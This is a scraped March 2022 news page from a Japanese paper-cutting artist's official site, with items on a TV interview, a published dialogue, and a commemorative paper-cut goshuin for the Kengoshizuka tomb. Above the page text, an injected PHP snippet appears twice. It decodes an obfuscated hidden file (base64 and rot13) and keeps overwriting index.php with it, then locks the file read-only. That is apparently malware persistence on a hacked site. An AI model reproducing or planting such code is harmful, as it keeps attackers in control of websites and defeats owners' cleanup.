$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 3月, 2022 | News | MOCHIME PAPER CUTTING Official Website
2022年3月

メディア情報

2022年03月23日

朝日放送「ココイロ」の取材を受けました。
放送予定 3月30日(水)夜9時50分~(約2分間)

対談掲載

2022年03月15日

陶芸家SHOWKOさんとの対談が、京都芸術大学内京都伝統文化イノベーション研究センター(KYOTO  T5)サイトで公開されました。こちらからご覧いただけます。

牽牛子塚古墳 特別記念 切り絵御朱印

2022年03月04日

sub2kofun

牽牛子塚古墳(奈良県明日香村)復元公開に合わせ発売されるオリジナル印「飛鳥乃余韻」第一弾のデザインを切り絵で制作しました。牽牛子塚古墳にて公開日の3月6日に限定発売予定です。販売につきまして、詳しくは明日香村観光ポータルサイト特設ページをご覧ください。

 

【牽牛子塚古墳復元公開 特別記念御朱印制作に寄せて】

牽牛子塚古墳の被葬者と考えられている斉明(皇極)天皇は、干ばつの中、飛鳥川上流で自ら雨乞いを行い、その雨が天下を潤したと日本書紀に記されています。

この、雨を祈る斉明(皇極)天皇の姿をシルエットで表し、天から宝雨が降り注ぐ様を、牽牛子塚古墳の出土品である七宝飾金具やガラス玉を散りばめ、象徴的に表現しました。

また、印が押される部分は、特徴的な八角墳を真上から捉えた形に描き起こし、アサガオの中に浮かび上がるようにデザインしています。

かつてその形状から「あさがお塚古墳」と呼ばれていたことにちなみ、明日香村の皆さんにより、古墳周辺にアサガオを植える計画が進められています。飛鳥時代に恵みの雨をもたらした天皇のものとされる陵が、現代の人々の手によって植えられたアサガオの中に浮かび上がる姿は、千三百年以上の時を超え、人と人の心が通い合うようで感動します。このイメージをそのままに絵柄を構想し、切り絵を制作しました。

貴重な遺産を未来に届けるべく、復元公開されるこの機会に、この御朱印が古からつづく土地の記憶に思いを馳せる縁となりますよう願っています。